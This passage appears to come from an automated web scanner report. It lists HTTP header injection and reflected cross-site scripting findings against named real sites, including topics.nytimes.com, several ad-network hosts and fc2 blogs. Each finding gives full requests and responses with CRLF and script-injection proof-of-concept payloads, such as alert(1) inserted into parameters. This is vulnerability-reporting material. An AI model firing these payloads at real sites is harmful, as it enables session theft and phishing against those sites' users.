Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; expires=Tue, 21-Feb-12 00:22:21 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=1; path=/; expires=Sun, 26-Feb-12 00:22:21 GMT; domain=tacoda.at.atwola.com
ntCoent-Length: 170
Content-Type: application/x-javascript
Content-Length: 170

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239';
ANRTXR();


2.27. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload b91d7%0d%0a7626810d274 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DWT:DUY&si=b91d7%0d%0a7626810d274&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dfa%253Afa_it%252Cind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dfa%25253Afa_it%25252Cind%25253Aind_bizser&df=1&v=5.5&cb=54408 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=fa:fa_it,ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1298647046|52766^1^1298647046|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|#|53615|52766|60130|50213|50239; N=2:cdf4c464d15cc8a036230e4fb13e242c,2d4ec7443dfa469e64430537b01b46dc; ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 00:20:08 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Feb 2011 00:35:08 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 21-Feb-12 00:20:08 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284408|52766^1^1299284408|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; path=/; expires=Sat, 05-Mar-11 00:20:08 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298679608^1298681408|b91d7
7626810d274
^1298679608^1298681408; path=/; expires=Sat, 26-Feb-11 00:50:08 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239; expires=Tue, 21-Feb-12 00:20:08 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sat, 26-Feb-11 06:20:08 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:2d4ec7443dfa469e64430537b01b46dc,d2e443c9307d12f368e0d29c574482d3; expires=Tue, 21-Feb-12 00:20:08 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; expires=Tue, 21-Feb-12 00:20:08 GMT; path=/; domain=.at.atwola.com
Set-Cookie: eadx=1; path=/; expires=Sun, 26-Feb-12 00:20:08 GMT; domain=tacoda.at.atwola.com
Cteonnt-Length: 170
Content-Type: application/x-javascript
Content-Length: 170

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239';
ANRTXR();


2.28. http://topics.nytimes.com/top/news/business/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 7629a%0d%0ae86b24d9faf was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /top/7629a%0d%0ae86b24d9faf/business/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 26 Feb 2011 02:27:58 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/7629a
e86b24d9faf
/business/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.29. http://topics.nytimes.com/top/news/business/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://topics.nytimes.com
Path:   /top/news/business/

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 2baca%0d%0abcabc2a4d67 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /top/news/2baca%0d%0abcabc2a4d67/ HTTP/1.1
Host: topics.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 26 Feb 2011 02:27:59 GMT
Content-length: 122
Content-type: text/html
Location: http://topics.nytimes.com/top/news/2baca
bcabc2a4d67
/index.html
Connection: close

<HTML><HEAD><TITLE>Moved Permanently</TITLE></HEAD>
<BODY><H1>Moved Permanently</H1>
An error has occurred.
</BODY></HTML>

2.30. http://tracker-clk.bidder7.mookie1.com/tr-clk [url parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracker-clk.bidder7.mookie1.com
Path:   /tr-clk

Issue detail

The value of the url request parameter is copied into the Location response header. The payload 374a9%0d%0acb875d12bdd was submitted in the url parameter. This caused a response containing an injected HTTP header.

Request

GET /tr-clk?a=b5458553-7549-414b-83d2-2100a7556d38&b=1&c=10000114&x=rtbbid7us2&url=374a9%0d%0acb875d12bdd HTTP/1.1
Host: tracker-clk.bidder7.mookie1.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Wed, 23 Feb 2011 23:08:29 GMT
Server: Apache/2.2.3 (Red Hat)
Location: 374a9
cb875d12bdd

Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


2.31. http://tracker.bidder7.mookie1.com/tr-goog [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tracker.bidder7.mookie1.com
Path:   /tr-goog

Issue detail

The value of the u request parameter is copied into the Location response header. The payload a6f3b%0d%0a3b973d7f1cc was submitted in the u parameter. This caused a response containing an injected HTTP header.

Request

GET /tr-goog?a=2cd8346d-f045-42c9-88fc-dcc60b1aceb1&b=1&c=10000114&p=TWV-MwAH-acK5XDhULtPxCNCNsaN77VR2WofqQ&u=a6f3b%0d%0a3b973d7f1cc&z=-06:00&x=rtbbid3us2 HTTP/1.1
Host: tracker.bidder7.mookie1.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW801b0RcADNFE; RMFM=011PphRBU10Dzy; other_20110126=set; id=3375925924; dlx_XXX=set

Response

HTTP/1.1 302 Found
Date: Wed, 23 Feb 2011 21:38:05 GMT
Server: Apache/2.2.3 (Red Hat)
Location: http://matcher.bidder7.mookie1.com/tracker?eid=google&id=a6f3b
3b973d7f1cc
&p=TWV-MwAH-acK5XDhULtPxCNCNsaN77VR2WofqQ
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


3. Cross-site scripting (reflected)

There are 517 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://1buy.blog.fc2.com/blog-entry-14.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://1buy.blog.fc2.com
Path:   /blog-entry-14.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cbe"><script>alert(1)</script>05fd418e794 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /blog-entry-14.html?89cbe"><script>alert(1)</script>05fd418e794=1 HTTP/1.1
Host: 1buy.blog.fc2.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Tue, 19 Apr 2011 12:50:35 GMT
Content-Type: text/html;charset=utf-8
Connection: keep-alive
X-Powered-By: PHP/5.3.5
X-UA-Compatible: IE=EmulateIE7
Set-Cookie: cookietest=test; expires=Fri, 29-Apr-2011 12:50:35 GMT; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 74593
Content-Language: en

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content
...[SNIP]...
<form action="http://1buy.blog.fc2.com/?no=14&amp;89cbe"><script>alert(1)</script>05fd418e794=1&amp;ul=66eee467b058c0b3" method="get">
...[SNIP]...

3.2. http://66.226.75.109/areaCodes/detail/240/x22 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://66.226.75.109
Path:   /areaCodes/detail/240/x22

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eab4"><img%20src%3da%20onerror%3dalert(1)>11b26d08f45 was submitted in the REST URL parameter 3. This input was echoed as 1eab4"><img src=a onerror=alert(1)>11b26d08f45 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /areaCodes/detail/2401eab4"><img%20src%3da%20onerror%3dalert(1)>11b26d08f45/x22 HTTP/1.1
Host: 66.226.75.109
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 01:54:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=3b6903bdbf87953dd60f786f4943fe8b; expires=Sat, 05-Mar-2011 01:54:07 GMT; path=/
Connection: close
Content-Type: text/html
Content-Length: 332163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>
       Area Code Re
...[SNIP]...
<a href="/npa_nxx/view/2401eab4"><img src=a onerror=alert(1)>11b26d08f45-000">
...[SNIP]...

3.3. http://a.collective-media.net/adj/cm.glam_lifestyle/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_lifestyle/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9545b'-alert(1)-'8a73e893162 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_lifestyle9545b'-alert(1)-'8a73e893162/;sz=160x600;ord=1303349053? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Thu, 21 Apr 2011 01:29:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:29:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_lifestyle9545b'-alert(1)-'8a73e893162/;sz=160x600;net=cm;ord=1303349053;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.4. http://a.collective-media.net/adj/cm.glam_lifestyle/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_lifestyle/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7db6'-alert(1)-'1bcc942b3b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_lifestyle/;sz=160x600;ord=1303349053?&a7db6'-alert(1)-'1bcc942b3b7=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Thu, 21 Apr 2011 01:28:57 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:28:57 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_lifestyle/;sz=160x600;net=cm;ord=1303349053?&a7db6'-alert(1)-'1bcc942b3b7=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.5. http://a.collective-media.net/adj/cm.glam_lifestyle/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_lifestyle/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9589d'-alert(1)-'154b0a42b13 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_lifestyle/;sz=160x600;ord=1303349053?9589d'-alert(1)-'154b0a42b13 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 447
Date: Thu, 21 Apr 2011 01:28:56 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:28:56 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_lifestyle/;sz=160x600;net=cm;ord=1303349053?9589d'-alert(1)-'154b0a42b13;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.6. http://a.collective-media.net/adj/cm.glam_style/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_style/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79f31'-alert(1)-'a96910d97e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_style79f31'-alert(1)-'a96910d97e8/;sz=160x600;ord=1303349054? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 442
Date: Thu, 21 Apr 2011 01:29:05 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:29:05 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_style79f31'-alert(1)-'a96910d97e8/;sz=160x600;net=cm;ord=1303349054;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.7. http://a.collective-media.net/adj/cm.glam_style/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_style/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5789'-alert(1)-'8eb0f877f25 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_style/;sz=160x600;ord=1303349054?&e5789'-alert(1)-'8eb0f877f25=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 446
Date: Thu, 21 Apr 2011 01:29:02 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:29:02 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_style/;sz=160x600;net=cm;ord=1303349054?&e5789'-alert(1)-'8eb0f877f25=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

3.8. http://a.collective-media.net/adj/cm.glam_style/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.glam_style/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c20e'-alert(1)-'a0458ba84a8 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.glam_style/;sz=160x600;ord=1303349054?1c20e'-alert(1)-'a0458ba84a8 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/d5a43de1-76cb-482d-b60c-710bb61c0a49?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349054
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11f8f328940989e; JY57=3c8l6OS0i837DN4jhYrey9dDCbp7hYUThCr39Jsy7-rbCSEhPjb6zQg; dc=dc; apnx=1; qcms=1; nadp=1; blue=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 443
Date: Thu, 21 Apr 2011 01:29:00 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sat, 21-May-2011 01:29:00 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.glam_style/;sz=160x600;net=cm;ord=1303349054?1c20e'-alert(1)-'a0458ba84a8;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

